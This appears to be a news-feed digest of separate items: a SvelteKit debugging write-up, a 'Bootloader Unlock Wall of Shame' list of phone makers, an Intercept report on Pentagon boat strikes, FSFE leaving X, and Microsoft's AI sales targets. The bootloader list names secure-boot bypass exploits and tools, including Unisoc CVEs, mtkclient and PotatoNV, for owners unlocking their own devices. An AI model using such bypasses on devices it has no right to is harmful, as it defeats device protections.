Although in this case the two methods happen to share a lower bound, the upper bound has been dramatically reduced. The total range of the confidence interval is more than halved! This was because we allocated the samples more cleverly – concentrated them in the early parts of the function – rather than increased the number of samples.

That said, we’re at a computer, so we could try increasing the sample count. Or maybe both?

Method 5 % 95 % Range
Single operation (10,000 samples) 1.461 1.884 0.423
Two operations (5,000 samples × 2) 1.461 1.630 0.169
Single operation (100,000 samples) 1.549 1.680 0.131
Two operations (50,000 samples × 2) 1.524 1.578 0.054

It seems like sampling more cleverly has almost the same effect as taking ten times as many samples.

We could play around with where to put the breakpoint, and how many samples to allocate to each side of it, and see which combination yields the lowest error. Then we can run that combination with a lot of samples to get the most accurate final result. That would take maybe 15 minutes of tooting about and exploring sensible-seeming alternatives, so it’s probably still quicker than integrating by hand.
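A sketch of that exploration, reusing the Ic function from above (the candidate breakpoints here are arbitrary):

// For each candidate breakpoint, estimate both regions and report the
// width of the combined 90 % confidence interval (smaller is better).
let f = x => Math.sin(x)/x;
for (let bp of [3, 6, 12, 25]) {
    let a = Ic(5_000, 0, bp, f);
    let b = Ic(5_000, bp, 100, f);
    // Recover each region's standard error from its interval, then
    // add them in quadrature to get the combined interval width.
    let seA = (a.p95 - a.p05) / (2 * 1.645);
    let seB = (b.p95 - b.p05) / (2 * 1.645);
    console.log(bp, (2 * 1.645 * Math.sqrt(seA**2 + seB**2)).toFixed(3));
}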

When the computer is not enough

It should be said that there are times when numeric solutions aren’t great. I hear that in electronics and quantum dynamics, there are sometimes integrals whose value is not a number, but a function, and knowing that function is important in order to know how the thing it’s modeling behaves in interactions with other things.

Those are not my domains, though. And when that’s not the case, the computer beats Feynman any day of the week.

Hunting a production-only proxy bug in SvelteKit

Lobsters
drew.silcock.dev
2025-12-04 15:58:18
Comments...
Original Article

I came across a pretty gnarly/fun bug in my Svelte project recently that had me scratching my head for a while and turned out to be a bug in SvelteKit itself, so I thought I’d write up the process I went through in finding, debugging, and fixing it.

Hopefully, someone will find this useful if they come across a similar issue (this includes me in 3 months time when I’ve forgotten all about this).

There didn’t seem to be a lot around it when I was frantically Googling it during the early phases of “why is this happening to me???”, anyway.

So what’s the issue?

I’ve got a medium-sized SvelteKit app that I’ve been working on-and-off for a few years now (maybe 50k SLOC across a few hundred files) and I recently (finally) took the plunge to update it from Svelte 4 to Svelte 5. It was a pretty painful few days, but at the end of it, I had my app working locally with runes enabled on every single page and component.

There was just one issue – when I pushed my code up to the staging server, it didn’t work :-(

And when I say “didn’t work”, I mean not a single page would load. Not even the main layout would load.

Works on my machine

It’s basically impossible to debug an issue in production or even on a staging server, so the first thing was to figure out why, given this issue was 100% reproducible and unavoidable by visiting any page on the staging server, I wasn’t seeing anything wrong when running it locally.

So what’s the difference between how this is running locally and in prod/staging? Who are the main suspects in this murder mystery where my staging server is the tragic victim?

Well, the main thing is that when I run it locally, I use pnpm dev whereas in prod, I use the Node Adapter running inside Docker. This narrows it down somewhat – here are the main suspects:

  • The Docker environment is Linux and I’m developing on macOS.
  • I use Sentry in prod/staging but have it disabled locally – it could be doing something naughty? I updated all my dependencies including Sentry integration during the Svelte upgrade so this bump could’ve introduced an issue.
  • The Node Adapter environment is different from the vite dev environment.
  • It could be an issue with the staging infra (REST API, DB, etc.) which is cascading down to the frontend, or the issue could only be present in error handling code which is only triggered by an issue w/ the staging infra.

Geolocating the bug

The staging server gives me no information in the interface/browser console, but if I dig through the container logs I can see a single error message:

Unable to retrieve user dashboard: TypeError: Cannot read private member #state from an object whose class did not declare it
    at Proxy.clone (node:internal/deps/undici/undici:10027:31)
    at UsersApi.fetchApi (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:170:30)
    at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
    at async UsersApi.request (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:90:22)
    at async UsersApi.getCurrentUserDashboardRaw (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:110:22)
    at async UsersApi.getCurrentUserDashboard (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:126:22)
    at async load (file:///app/build/server/chunks/12-CIrAv-H7.js:16:23)
    at async fn (file:///app/build/server/index.js:3022:14)
    at async load_data (file:///app/build/server/index.js:3013:18)
    at async file:///app/build/server/index.js:4639:18

Ahah, our first clue! 🔎

Okay, so it looks like the frontend is trying to hit the REST API to get user information to load the main dashboard, and it’s hitting an error inside some internal node dependency called “undici” 🤔

This is a bit weird – my code is the next stack up, in UsersApi.fetchApi – this code is auto-generated using OpenAPI Generator’s typescript-fetch generator , meaning it has been auto-generated from the OpenAPI specification of my REST API. That hasn’t changed in the recent upgrade, so it must be one of the dependencies that I updated…

This is all a bit weird as the actual error is happening inside an internal node dependency, undici . I haven’t bumped my Node version itself so this clue confuses me greatly.

Let’s check out my code that’s creating the error. The stack trace is from a prod build so it’s giving me a line number from the built chunk, but that’s fine. Here’s the code:

163      ...
164      for (const middleware of this.middleware) {
165          if (middleware.post) {
166              response = await middleware.post({
167                  fetch: this.fetchApi,
168                  url: fetchParams.url,
169                  init: fetchParams.init,
170                  response: response.clone()
171              }) || response;
172          }
173      }
174      ...

The Cloning Theorem

Okay, so response.clone() is where the error is happening. The response object is an instance of Response coming from fetch() which is what the undici library provides, but the stack trace doesn’t say Response.clone() , it says Proxy.clone() … Another mystery 🤔

But what does the actual error mean? Apparently I have been living under a TypeScript rock for the last few years, because I don’t think I’ve ever actually seen anyone using #my-element in JavaScript before, even though it’s been deployed to V8 since 2019 .

Anyway, if you have a class in JavaScript with an element (MDN says not to call them properties, because property implies some attributes which these private elements don’t have, but you can mentally replace “element” with “field or method”) whose name starts with #, the JavaScript runtime enforces that this element cannot be accessed from outside the class – they are private.

This kind of makes sense – the stack trace says Proxy.clone() , not Response.clone() , but it is the undici Response class that defines the private #state field. You can see the code for yourself on nodejs/undici . The Proxy class isn’t allowed to see Response class’s privates – they just don’t have that kind of relationship.

So now the question is: who’s doing the proxying???

It’s always lupus Sentry

Like Dr. House barely 10 minutes into the episode [1], I was convinced that Sentry was the culprit – I had updated the library and the update was doing something stupid. As an error handling/tracing library, it must be proxying the response so that it can determine whether it is an error response to report back to the Sentry server.

It’s perfect – it fits all the symptoms and explains why I’m not seeing the issue locally (I disable Sentry in the local dev environment). [2]

As such, I prescribed an immediate Sentry-ectomy, removing all the Sentry code whatsoever and pushing the update up to staging, confident that my clinical intervention would immediately resolve the issue and reveal the culprit as Sentry.

The result? Still broke. The patient was still dying. The murderer remained at large. The dominoes of my Sentry theory had fallen like a house of cards – checkmate.

It must be something about Docker or Node Adapter then

At this point I thought that it must be something to do with running inside Docker or using the Node Adapter, so I:

  • Ran pnpm build and node --env-file=.env build – no issue.
  • Ran docker build -t my-app . and docker run --network=host --rm --env-file=.env my-app – no issue.

This was getting weird now.

Death by Proxy

At this point, we need more clues. This is probably the bit of the episode where Dr. House intentionally makes the patient worse to try to figure out what the underlying issue is.

Luckily, we have a more precise surgical tool to figure out who is using Proxy , and the answer is… Proxy .

What exactly does Proxy do? Well, if you want to attach additional functionality to a pre-existing class or function, you can wrap it in a proxy and insert your own code into the process. This is especially useful for things like tracing, which is why I (unfairly) blamed Sentry earlier.

Here’s an example:

const originalLog = console.log;
console.log = new Proxy(originalLog, {
    apply(target, thisArg, args) {
        const convertedArgs = args.map(arg => {
            if (typeof arg === 'string') {
                return arg
                    .split('')
                    .map((char, i) => (i % 2 === 0 ? char.toLowerCase() : char.toUpperCase()))
                    .join('');
            }
            return arg;
        });

        return Reflect.apply(target, thisArg, convertedArgs);
    }
});

So what does this strange-looking code do? Let’s try it out:

» console.log("The quick brown fox jumps over the lazy dog")

← tHe qUiCk bRoWn fOx jUmPs oVeR ThE LaZy dOg

Now you can successfully make everything that logs to your console sound ✨ sardonic and disingenuous ✨ I call it spongelog (trademark pending).

For those of you lucky enough not to have come across Reflect and/or apply yet: invoking a function like myClass.doSomethingNow(arg1, arg2) is the same as doing myClass.doSomethingNow.apply(myClass, [arg1, arg2]), which is also the same as doing myClass.doSomethingNow.call(myClass, arg1, arg2), which is the same as Reflect.apply(myClass.doSomethingNow, myClass, [arg1, arg2]) … Yeah, this is what JavaScript is like. Keep adding newer, more “modern” ways of doing the same things without ever removing the old ways.

So how can we proxy-ception our response to find our culprit?

const OriginalProxy = Proxy;
globalThis.Proxy = new Proxy(OriginalProxy, {
    construct(target, args, newTarget) {
        // We are proxying the creation of a proxy, so the first arg to the
        // constructor is the object we're proxying. We only care about code
        // that's proxying the response.
        const proxiedClass = args[0].constructor.name;
        if (proxiedClass === "Response") {
            console.trace("Creating response Proxy");
        }
        return Reflect.construct(target, args, newTarget);
    },
});

This time we are intercepting the constructor of the Proxy class so that we can find what piece of code is doing new Proxy(response, ...) . When you do new Proxy() , the first argument is the thing we’re proxying, so we want to find who is calling new Proxy() with a first argument that is an instance of undici’s Response class – we can do this by getting the name of the constructor, which is the same as the name of the class. (It’s possible that there’s another class called Response elsewhere in the code, but it’s unlikely.)

Don’t be silly and accidentally put this code somewhere where it runs on every request, or you’ll end up with exponential explosion of console.trace calls as each new proxy triggers the other proxies and adds another trace to the pile, like the logging equivalent of a nuclear bomb… Not that I did that or anything, that would be stupid haha…

And the culprit is…

Here’s the single trace that showed:

Trace: Creating response Proxy
    at Object.construct (.../src/hooks.server.ts:20:17)
    at universal_fetch (.../node_modules/.pnpm/@[email protected]_@[email protected]_@[email protected]_svelte_1a81703e589b392db9a0fd6d8f25cd68/node_modules/@sveltejs/kit/src/runtime/server/page/load_data.js:331:17)
    at process.processTicksAndRejections (node:internal/process/task_queues:105:5)

The first frame at hooks.server.ts is just where my proxy-ception code is running, so we can ignore that. The culprit is @sveltejs/kit/src/runtime/server/page/load_data.js.

Here’s an abbreviation of what the code is doing:

const proxy = new Proxy(response, {
    get(response, key, _receiver) {
        // Lots of SvelteKit-specific functionality which isn't relevant for us
        // ...

        return Reflect.get(response, key, response);
    }
});

What’s this all about then?

So what’s the issue with this? Well, prior to my raising a bug in the SvelteKit repo, there was precisely one mention of this specific bug: nodejs/undici#4290, which explains that when you proxy an object that has methods, doing obj[key] or Reflect.get(obj, key, obj) will get the method from the object [3] but will not bind the resulting method to obj . Normally, this doesn’t matter, but when you’re proxying an object, this will be bound not to the object but to the proxy instance itself.

This explains why the stack trace was showing Proxy.clone() instead of Response.clone() because when clone() was running, this was an instance of Proxy , not an instance of Response .

Hi, I’m the problem, it’s me

You might be wondering why this issue only occurred in prod/staging and not locally. The answer is that I was being stupid. [4]

I was convinced that the reason this was happening was because of this big Svelte upgrade that I just did, but the truth is that it’s completely unrelated and this just happened to be the first update I’d made to the app since node:lts Docker image changed from Node v22 to Node v24 in October 2025.

In the CI pipeline, it was Node v24 that was being pulled instead of v22 – the #state private field was introduced in v24 so that is why the issue was not showing before.

As to why it wasn’t showing when I ran it locally using Docker – my Docker was using a cached node:lts image, which was the old v22 one. 🤦🏻‍♂️

It’s version managers all the way down

I tried verifying this by doing fnm use 24 followed by pnpm dev , but the bug was still mysteriously missing.

It is at this point that I found out that pnpm has its own node version manager built in, which you can invoke using pnpm env use --global 24 . If you want to be sure, pnpm exec node --version will tell you.

So not only can pnpm manage its own version using the packageManager field in package.json , it can also manage the node version. What a crazy world we live in.

Applying the fix

With the pnpm-managed node version set to 24, sure enough the issue was present locally. Applying the quick fix recommended in the undici GitHub issue as a manual patch to the library files in node_modules fixed the issue:

Shown as a diff against the snippet above:

 const proxy = new Proxy(response, {
-    get(response, key, _receiver) {
+    get(response, key, receiver) {
         // Lots of SvelteKit-specific functionality which isn't relevant for us
         // ...

-        return Reflect.get(response, key, response);
+        const value = Reflect.get(response, key, response);
+
+        if (value instanceof Function) {
+            // On Node v24+, the Response object has a private element #state – we
+            // need to bind this function to the response in order to allow it to
+            // access this private element. Defining the name and length ensure it
+            // is identical to the original function when introspected.
+            return Object.defineProperties(
+                /**
+                 * @this {any}
+                 */
+                function () {
+                    return Reflect.apply(value, this === receiver ? response : this, arguments);
+                },
+                {
+                    name: { value: value.name },
+                    length: { value: value.length }
+                }
+            );
+        }
+
+        return value;
     }
 });

Okay, but what’s up with the Object.defineProperties() nonsense?

This is probably not needed, but the recommended fix from MDN returns a bound method that is slightly different from the original. You can see this by comparing the different approaches:

class Person {
    #hunger = "hungry";

    status(name, email) {
        return `I am ${name} <${email}> and I am ${this.#hunger}`;
    }
};

const me = new Person();

brokenProxy = new Proxy(me, {
    get(target, prop, receiver) {
        return Reflect.get(target, prop, receiver);
    }
})

plainProxy = new Proxy(me, {
    get(target, prop, receiver) {
        const value = Reflect.get(target, prop, receiver);

        if (value instanceof Function) {
            return function (...args) {
                return value.apply(target, args);
            }
        }

        return value;
    }
});

fancyProxy = new Proxy(me, {
    get(target, prop, receiver) {
        const value = Reflect.get(target, prop, receiver);

        if (value instanceof Function) {
            // On Node v24+, the Response object has a private element #state – we
            // need to bind this function to the response in order to allow it to
            // access this private element. Defining the name and length ensure it
            // is identical to the original function when introspected.
            return Object.defineProperties(
                function () {
                    return Reflect.apply(value, this === receiver ? target : this, arguments);
                },
                {
                    name: { value: value.name },
                    length: { value: value.length }
                }
            );
        }

        return value;
    }
});

Here are the differences:

» brokenProxy.status("Drew", "[email protected]")

⚠︎ brokenProxy.status()

Uncaught TypeError: can't access private field or method: object is not the right class

status debugger eval code:5

<anonymous> debugger eval code:1

» plainProxy.status("Drew", "[email protected]")

← "I am Drew <[email protected]> and I am hungry"

» plainProxy.status.name

← ""

» plainProxy.status.length

← 0

» fancyProxy.status("Drew", "[email protected]")

← "I am Drew <[email protected]> and I am hungry"

» fancyProxy.status.name

← "status"

» fancyProxy.status.length

← 2

As expected, the broken proxy fails: this is not bound to the underlying object, so the private Person.#hunger field cannot be accessed. Both the plain and fancy proxies work when invoked, but when you look at their name and length (the latter being the number of arguments), only the fancy one matches the original.

Some JavaScript code will introspect a method to see what the name and length are for various (somewhat hacky) reasons. (There’s a lot of bad JavaScript code out there, trust me – I only wrote some of it.) This is probably pretty unlikely, but if you thought this was a bad bug to find, just think about how nasty it would be to track down some stray code that was introspecting the name and/or length of some random method on response and making faulty assumptions based on the incorrect values presented by the proxied method 🤢

Fixed 🎉

I created a PR with this fix whereupon it was quickly merged and within 4 days it was bundled into the next SvelteKit release – this project is really actively maintained.

I was quite surprised that this wasn’t picked up by anyone else – after all, any call to response.clone() where the response comes from SvelteKit’s fetch() inside a page load handler would trigger this bug as long as you’re on Node v24+. I guess cloning responses isn’t a very common thing to do? 🤷🏻

Regardless, the murderer is serving hard time, the patient is recovering, and I can go touch some grass and not think about JavaScript for a while.

Further Reading

  1. If House was so clever, he would know that his first guess isn’t right because it’s only 10 minutes into the episode but hey, I’m not the one with the medical degree.

  2. I am mixing the metaphors a little here – first it’s a murder, now it’s a diagnostic mystery – just stick with it.

  3. If you’re wondering what the difference is between obj[key] and Reflect.get(obj, key, obj) , it only makes a difference when key has a getter defined on obj which means that doing obj[key] actually invokes the getter method – Reflect.get() ensures that this is correctly bound to obj when the getter is invoked.

  4. To be fair, this is generally a decent bet.

Bootloader Unlock Wall of Shame

Hacker News
github.com
2025-12-04 15:57:21
Comments...
Original Article

[Banner: a lock and a key on fire on the left, with the text 'Bootloader Unlock: Wall of Shame' on the right]

Keeping track of companies that "care about your data 🥺"


Terrible License CC BY-NC-SA


Why?

Over the past few years, a suspicious number of companies have started to "take care of your data", aka block/strictly limit your ability to unlock the bootloader on your own devices.

While this may not affect you directly, it sets a bad precedent. You never know what will get the axe next: Shizuku? ADB?

They've already gone after sideloading .

I thought it might be a good idea to keep track of bad companies and workarounds.

If you know of specific details/unlocking methods, please PR them or drop them in the discussions

The list:

Caution

Reminder that no matter how nice a company is,
you should not trust them unless their unlock process is 100% offline!

🍅 Just terrible!

The following manufacturers have made it completely impossible to unlock their devices without a workaround.

Alcatel

Amazon

Apple

Asus

Cat

Coolpad

Doogee

Energizer

Huawei

Meizu

Panasonic

Samsung

Sharp

TCL/BlackBerry

Vivo/IQOO

Windows phones

Carrier Locked Devices

Note

Phone brands handle carrier locks differently, so check your device manual or contact support.

Carrier locked devices are the ones you get after making a commitment with a carrier of your choice. This is quite common in North America and (supposedly) allows you to save some money on your device.

As a rule, almost all carrier locked devices do not allow the bootloader to be unlocked. This usually makes sense, as it would allow you to completely bypass the contract. The problem is that many devices still do not allow you to unlock the bootloader even after the carrier lock has been lifted. For more details, see the carriers page .

⛔ Avoid at all costs!

The following manufacturers allow unlocking under certain conditions, such as region, model, SOC, etc., or require a sacrifice to unlock.

Hisense

HMD/Nokia

Honor

HTC

LG

Motorola/Lenovo/NEC

OPPO/Realme

Xiaomi/Redmi/POCO

ZTE/nubia

⚠️ Proceed with caution!

The following manufacturers require an online account and/or a waiting period before unlocking.

Fairphone

Google/Nexus

Infinix

itel

OnePlus

Sony

Tecno

ℹ️ "Safe for now" :trollface:

Blackview

Cubot

Micromax

Microsoft

Nothing

Oukitel

Shift

Teclast

Teracube

Ulefone

Umidigi

Volla

TP-Link/Neffos

Misc info

Custom AVB Keys

Custom Android Verified Boot (AVB) keys are a feature that allows you to run a custom OS with a locked bootloader.

It's rare to see a device that supports custom AVB keys, but some can be found here.

Universal SOC-based methods

Kirin

Kirin 620, 650, 655, 658, 659, 925, 935, 950, 960:
It's possible to unlock using testpoints and PotatoNV (read the README)

MediaTek

If you own a MediaTek device exploitable by mtkclient, you can unlock the bootloader using that.
If it also happens to be an OPPO/Realme device and you need to access fastboot: lkpatcher (web version)

Qualcomm

There's no universal Qualcomm method, unfortunately.

Although some of these might work for you:

The general exploit:
see the bootloader unlock section at alephsecurity.com.

Xiaomi Mi A1 and maybe all MSM89** manufactured before 2018:
EDLUnlock

Unisoc

If you own a phone with the Unisoc UMS9620 or older, you can use this exploit to achieve a temporary secure boot bypass and persistently unlock the bootloader (except on some devices with a modified uboot): CVE-2022-38694_unlock_bootloader

If you own a phone with the Unisoc UMS312, UMS512, or UD710, you can use this exploit to achieve a persistent secure boot bypass, which means all firmware, including splloader and uboot, can be modified and re-signed: CVE-2022-38691_38692

Otherwise, you can also look into this: Spectrum_UnlockBL_Tool
This: xdaforums.com
Or this: subut


Pentagon Claims It “Absolutely” Knows Who It Killed in Boat Strikes. Prove It, Lawmaker Says.

Intercept
theintercept.com
2025-12-04 15:41:51
Rep. Chrissy Houlahan said, “If there is intelligence to 'absolutely confirm' this, the Congress is ready to receive it.” The post Pentagon Claims It “Absolutely” Knows Who It Killed in Boat Strikes. Prove It, Lawmaker Says. appeared first on The Intercept....
Original Article

After Pentagon Press Secretary Kingsley Wilson declared the War Department was certain about the identities of supposed drug smugglers killed in boat strikes, Rep. Chrissy Houlahan, D-Pa., had some questions about the intelligence. When Houlahan called on Wilson to appear before Congress, however, the outspoken and controversial spokesperson suddenly went silent.

“I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Wilson said on Tuesday during a pseudo Pentagon press briefing where attendance was limited to media that have agreed to limits on the scope of their reporting.

“[O]ur intelligence absolutely confirms who these people are,” she said. “I can tell you that, without a shadow of a doubt, every single one of our military and civilian lawyers knows that these individuals are narcoterrorists.”

In exclusive comments to The Intercept, Houlahan expressed her doubts and demanded proof.

“If there is intelligence that ‘absolutely confirms’ this — present it. Come before the House or Senate Intelligence committees and let Congress provide the proper oversight and checks and balances the American people deserve,” said Houlahan, who serves on the House Armed Services Committee and the House Permanent Select Committee on Intelligence. “Put the whispers and doubts to rest once and for all. If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it. Until we all see it, you can surely understand why we are skeptical.”

Both committees on which Houlahan serves routinely receive classified briefings from the military.

Wilson – who touted a “new era” of working to “keep the American people informed and to ensure transparency” on Tuesday – did not respond to questions or requests for comment from The Intercept about Houlahan’s remarks or appearing before Congress.

In past classified briefings to lawmakers and Congressional staff, the military has admitted that it does not know exactly who it’s killing in the boat strikes, according to seven government officials who have spoken with The Intercept.

Rep. Sara Jacobs, D-Calif., also a member of the House Armed Services Committee, said that Pentagon officials who briefed her admitted that the administration does not know the identities of all the individuals who were killed in the strikes.

“They said that they do not need to positively identify individuals on the vessels to do the strikes,” Jacobs told The Intercept in October. “They just need to show a connection to a DTO or affiliate,” she added, using shorthand for “designated terrorist organizations,” the Trump administration’s term for the secret list of groups with whom it claims to be at war.

Twenty-One Attacks

The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September and killing at least 83 civilians . It has not conducted a strike on a vessel since November 15.

Since the strikes began, experts in the laws of war and members of Congress from both parties say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.

The summary executions mark a major departure from typical practice in the long-running U.S. war on drugs , where law enforcement agencies arrest suspected drug smugglers.

A double-tap strike during the initial September 2 attack — where the U.S. hit an incapacitated boat for a second time, killing two survivors clinging to the wreckage — added a second layer of illegality to strikes that experts and lawmakers say are already tantamount to murder . The double-tap strike was first reported by The Intercept .

War Secretary Pete Hegseth has been under increasing fire for that strike . The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”

Hegseth acknowledged U.S. forces conducted a follow-up strike on the alleged drug boat during a Cabinet meeting at the White House on Tuesday but distanced himself from the killing of people struggling to stay afloat.

“I didn’t personally see survivors,” Hegseth told reporters, noting that he watched live footage of the attack. “The thing was on fire. It was exploded in fire and smoke. You can’t see it.”

He added, “This is called the fog of war.”

Hegseth said Adm. Frank M. Bradley , then the commander of Joint Special Operations Command, or JSOC, and now head of Special Operations Command, “made the right call” in ordering the second strike, which the war secretary claimed came after he himself left the room. In a statement to The Intercept earlier this week, Special Operations Command pushed back on the contention that Bradley ordered a double-tap attack .

“He does not see his actions on 2 SEP as a ‘double tap,’” Col. Allie Weiskopf, the director of public affairs at Special Operations Command, told The Intercept on Tuesday .

Bradley and Gen. Dan Caine, the chair of the Joint Chiefs of Staff, are slated to go to Capitol Hill on Thursday to answer questions about the attack amid an ongoing uproar. Congressional staffers say that Bradley is currently slated to only meet with House Armed Services Committee Chair Mike Rogers, R-Ala., and ranking member Rep. Adam Smith, D-Wash., along with the Senate Armed Services Committee Chair Roger Wicker, R-Miss., and ranking member Sen. Jack Reed, D-R.I.

“The Seditious Six”

Houlahan was one of six Democratic members of Congress who appeared in a video late last month reminding members of the military of their duty not to obey illegal orders. President Donald Trump called for the group to face arrest and trial or even execution , saying the video amounted to “SEDITIOUS BEHAVIOR FROM TRAITORS.”

Wilson, during her faux press briefing — delivered to mostly administration cheerleaders after outlets from the New York Times to Fox News relinquished their Pentagon press passes rather than agree to restrictions that constrain reporters’ First Amendment rights — called out Houlahan and her fellow lawmakers in the video.

“[T]he Seditious Six urged members of our military to defy their chain of command in an unprecedented, treasonous and shameful conspiracy to sow distrust and chaos in our armed forces,” said Wilson. She went on to call the video “a politically motivated influence operation” that “puts our warfighters at risk.”

Hegseth described the members of Congress’s video as “despicable, reckless, and false.” Hegseth himself, however, had delivered a similar message recorded in 2016 footage revealed by CNN on Tuesday.

“If you’re doing something that is just completely unlawful and ruthless, then there is a consequence for that. That’s why the military said it won’t follow unlawful orders from their commander-in-chief,” Hegseth told an audience in the footage. “There’s a standard, there’s an ethos, there’s a belief that we are above what so many things that our enemies or others would do.”

Wilson did not reply to a request for comment about Hegseth’s remarks.

Hegseth is also in the hot seat after the Pentagon Inspector General’s Office determined that he risked the safety of U.S. service members by sharing sensitive military information on the Signal messaging app, according to a source familiar with the forthcoming report by the Pentagon watchdog.

The report, which is expected to be released on Thursday, was launched after a journalist at The Atlantic revealed he had been added to a chat on the encrypted messaging app in which Hegseth and other top officials were discussing plans for U.S. airstrikes in Yemen that also killed civilians .

The Free Software Foundation Europe deleted its account on X

Hacker News
fsfe.org
2025-12-04 15:33:14
Comments...
Original Article

The Free Software Foundation Europe deleted its account on X. The platform never aligned with our values and no longer serves as a space for communication. What was initially intended to be a place for dialogue and information exchange has turned into a centralised arena of hostility, misinformation, and profit-driven control, far removed from the ideals of freedom we stand for.

A split image shows the Twitter bird icon dissolving into digital fragments on the left and a colorful decentralized network on the right, with bright light at the center.

Since Elon Musk acquired the social network formerly known as Twitter and rebranded it as X, the Free Software Foundation Europe (FSFE) has been closely monitoring the developments of this proprietary platform, a space we were never comfortable joining, yet one that was once important for reaching members of society who were not active in our preferred spaces for interaction. Over time, it has become increasingly hostile, with misinformation, harassment, and hate speech more visible than ever.

The FSFE initially joined Twitter because it offered a space to promote Free Software values and to interact with policymakers, journalists, and, above all, people who were not yet familiar with Free Software and its benefits. The social network was another tool the FSFE used to share information about our initiatives, to explain to users their right to control their technology, and to promote software freedom across society, while also encouraging the use of alternative, decentralised social media networks.

However, the platform’s current direction and climate, combined with an algorithm that prioritises hatred, polarisation, and sensationalism, alongside growing privacy and data protection concerns, have led us to the decision to part ways with it.

Consequently, the FSFE decided to permanently delete its account on X. We remain active on some other proprietary platforms in order to reach a wider part of society, journalists, and decision makers.

At the same time, we strongly encourage everyone who shares our commitment to digital freedom and decentralisation to join us in the Fediverse. Unlike proprietary platforms driven by profit and centralised control, the Fediverse empowers users to choose how and where they connect, ensuring transparency, autonomy, and resilience. Follow the FSFE on Mastodon and Peertube !

Microsoft drops AI sales targets in half after salespeople miss their quotas

Hacker News
arstechnica.com
2025-12-04 15:31:52
Comments...
Original Article

Report: Microsoft declared “the era of AI agents” in May, but enterprise customers aren’t buying.

Microsoft has lowered sales growth targets for its AI agent products after many salespeople missed their quotas in the fiscal year ending in June, according to a report Wednesday from The Information. The adjustment is reportedly unusual for Microsoft, and it comes after the company missed a number of ambitious sales goals for its AI offerings.

AI agents are specialized implementations of AI language models designed to perform multistep tasks autonomously rather than simply responding to single prompts. So-called “agentic” features have been central to Microsoft’s 2025 sales pitch: At its Build conference in May, the company declared that it has entered “the era of AI agents.”

The company has promised customers that agents could automate complex tasks, such as generating dashboards from sales data or writing customer reports. At its Ignite conference in November, Microsoft announced new features like Word, Excel, and PowerPoint agents in Microsoft 365 Copilot, along with tools for building and deploying agents through Azure AI Foundry and Copilot Studio. But as the year draws to a close, that promise has proven harder to deliver than the company expected.

According to The Information, one US Azure sales unit set quotas for salespeople to increase customer spending on a product called Foundry , which helps customers develop AI applications, by 50 percent. Less than a fifth of salespeople in that unit met their Foundry sales growth targets. In July, Microsoft lowered those targets to roughly 25 percent growth for the current fiscal year. In another US Azure unit, most salespeople failed to meet an earlier quota to double Foundry sales, and Microsoft cut their quotas to 50 percent for the current fiscal year.

The sales figures suggest enterprises aren’t yet willing to pay premium prices for these AI agent tools. And Microsoft’s Copilot itself has faced a brand preference challenge: Earlier this year, Bloomberg reported that Microsoft salespeople were having trouble selling Copilot to enterprises because many employees prefer ChatGPT instead. The drugmaker Amgen reportedly bought Copilot software for 20,000 staffers, but many employees gravitated toward OpenAI’s chatbot instead, with Copilot mainly used for Microsoft-specific tasks like Outlook and Teams.

A Microsoft spokesperson declined to comment on the changes in sales quotas when asked by The Information. But behind these withering sales figures may lie a deeper, more fundamental issue: AI agent technology likely isn’t ready for the kind of high-stakes autonomous business work Microsoft is promising.

The gap between promise and reality

The concepts behind agentic AI systems emerged shortly after the release of OpenAI’s GPT-4 in 2023. They typically involve spinning off “worker tasks” to AI models running in parallel with a supervising AI model, and incorporate techniques to evaluate and act on their own results. Over the past few years, companies like Anthropic, Google, and OpenAI have refined those early approaches into far more useful products for tasks like software development, but they are still prone to errors.
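As a rough illustration of that pattern – a sketch only, not any vendor's actual implementation – a supervisor/worker loop looks something like this in JavaScript, with callModel as a hypothetical stand-in for an LLM API:

```javascript
// Hypothetical stand-in for an LLM API call – not a real library.
async function callModel(role, prompt) {
  return `[${role}] response to: ${prompt.slice(0, 40)}`; // stubbed output
}

// A heavily simplified supervisor/worker agent loop.
async function runAgent(task) {
  // The supervising model breaks the task into worker-sized steps...
  const plan = await callModel("supervisor", `Break into steps: ${task}`);
  const steps = plan.split("\n").filter(Boolean);

  // ...worker models execute the steps in parallel...
  const outputs = await Promise.all(steps.map((s) => callModel("worker", s)));

  // ...and the supervisor evaluates the results before acting on them.
  const reviews = await Promise.all(
    outputs.map((o) => callModel("supervisor", `Evaluate: ${o}`))
  );
  return reviews.join("\n");
}

runAgent("generate a dashboard from sales data").then(console.log);
```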

At the heart of the problem is the tendency of AI language models to confabulate, meaning they may confidently generate a false output and present it as factual. While confabulation has diminished with more recent AI models, as recent studies have shown, the simulated reasoning techniques behind the current slate of agentic AI assistants on the market can still make catastrophic mistakes and run with them, making them unreliable for the kind of hands-off autonomous work companies like Microsoft are promising.

While looping agentic systems are better at catching their own mistakes than running a single AI model alone, they still inherit the fundamental pattern-matching limitations of the underlying AI models, particularly when facing novel problems outside their training distribution. So if an agent isn’t properly trained to perform a task or encounters a unique scenario, it could easily draw the wrong inference and make costly mistakes for a business.

The “ brittleness ” of current AI agents is why the concept of artificial general intelligence , or AGI, is so appealing to those in the AI industry. In AI, “general intelligence” typically implies an AI model that can learn or perform novel tasks without having to specifically be shown thousands or millions of examples of it beforehand. Although AGI is a nebulous term that is difficult to define in practice, if such a general AI system were ever developed, it would hypothetically make for a far more competent agentic worker than what AI companies offer today.

Despite these struggles, Microsoft continues to spend heavily on AI infrastructure. The company reported capital expenditures of $34.9 billion for its fiscal first quarter ending in October, a record, and warned that spending would rise further. The Information notes that much of Microsoft’s AI revenue comes from AI companies themselves renting cloud infrastructure rather than from traditional enterprises adopting AI tools for their own operations.

For now, as all eyes focus on a potential bubble in the AI market, Microsoft seems to be building infrastructure for a revolution that many enterprises haven’t yet signed up for.

